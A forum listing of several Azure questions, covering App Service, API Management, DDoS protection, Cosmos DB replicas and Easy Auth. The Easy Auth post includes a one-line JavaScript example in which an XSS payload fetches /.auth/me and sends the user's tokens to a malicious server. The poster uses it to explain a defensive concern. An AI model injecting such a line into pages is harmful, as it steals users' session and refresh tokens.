Forum Widgets
Latest Discussions
Need help with Azure topics
Hello everyone! I have little knowledge on Azure - have completed AZ-900 certification. There's a project which requires knowledge on below topics: 1. Azure App Service 2. Function App 3. Logic App 4. API Management 5. Key Vault 6. App Insight 7. Redis Cache 8. Azure Service Bus 9. Event Hub 10. Event grid I tried looking for tutorials on these topics in Google but could find none apart from that in Microsoft docs - however, I am not able to understand what all sub-topics I need to cover. I need your help in identifying some resources and what sub topics should I exactly look into- I would be getting interviewed on these topics in a month. I am trying my best to learn these topics and do little hands on so that I have basic idea about these services. I am a backend developer in .Net with around 4.5 years of experience. Any help would be highly appreciated. Thanks much in advance #azure #azurePaaSAzure Logic Apps vs Power Automate
Hello Experts, Please guide me in selecting the more suitable option between Azure Logic Apps and Power Automate for developing an Enterprise application that operates on a scheduled basis. This application must interact with multiple on-premises and SaaS systems by making several REST API calls (approximately 8 - 10 calls) and storing the retrieved data (structural and unstructured). Thanks -Sri
Downtime of API Management during deployment
Which actions will cause a downtime of Azure API Management so APIs will not be able to consume (Premium Tier)? E.g. changing network would be obviously. But what about deployments of APIs, Products, Scaling up and down... How can I find out which actions will make the APIs unavailable? Or is there a mechanism which will keep them available in each scenario (Even if "Service is being updated")? Thanks!API Management Policy - Secure way to detect requests from Application Gateway
Hello. We got API Management which is reachable from internal network, and from external network (internet) via Application Gateway. I want to add an authorization policy in an API which only applies if requests are coming from external network. Microsoft recommends NOT to use Host Header because it can be modified by the user (https://learn.microsoft.com/en-us/azure/architecture/best-practices/host-name-preservation#context). Is there a secure way to check if requests are coming from external network? Would "Context.Request.OriginalUrl.Host" work for this - or is the value a copy of the Host Header? (https://learn.microsoft.com/en-us/azure/api-management/api-management-policy-expressions#ContextVariables)
Does Azure provide DDoS protection for its PaaS services?
Hi, I am working on a project wherein we will deploy Storage Account, KeyVault, ServiceBus, CosmosDB, and SQL DB in our subscription. All these services will be deployed with public access enabled, and we will only add private endpoints for local VNet traffic. From a security perspective, should I explicitly add DDoS protection to the above-mentioned services, or do they come with built-in DDoS protection? Example: Would a DDoS attack be able to bring down a Storage Account Blob Service (test.blob.core.windows.net)?Connect to cosmosdb read-only database
I have a cosmosdb and it has a read-only replica in another region . how to connect to it using RBAC authentication ( or using service principal) Can I limit the RU base on this service principal ? Is the RU used on this replica is shared with the primary read-write replica ? I am going to use python script from databricks to do so . thanks
App Service Easy auth and disabling /.auth/me
I plan on using Easy Auth with a ASP.NET Core web application hosted on Azure App Service with the Linux flavor. From my understanding Easy Auth adds a couple of endpoints to the app service: /.auth/login/<provider>/callback /.auth/logout /.auth/me Usually when I use OpenID Connect and OAuth 2.0 I always opt for the authorization code flow to avoid users having direct access to their tokens (id_token/access_token/refresh_token) as the backend is capable of handling this through cookies in the browser and tokens stored elsewhere away from the user. I have enabled Easy Auth with the token stored for my application and it works as expected. My question is mainly concerned with the /.auth/me endpoint. This endpoint exposes all the tokens, along with the claims of the user. If I enable scopes for offline_access then refresh_token is also exposed here. From a security perspective this seems horrible as a simple XSS attack could read the tokens and ship them off to an attackers server. fetch("/.auth/me").then(r => r.json()).then(sendToMaliciousServer) My questions are: Can I disable this endpoint in Easy Auth to avoid the security issue while still maintaining access to having a token store? Is MSAL (or rather Microsoft.Identity.Web) dependant on this endpoint to be able to read out the access_token from the token store of Easy Auth before calling downstream services?
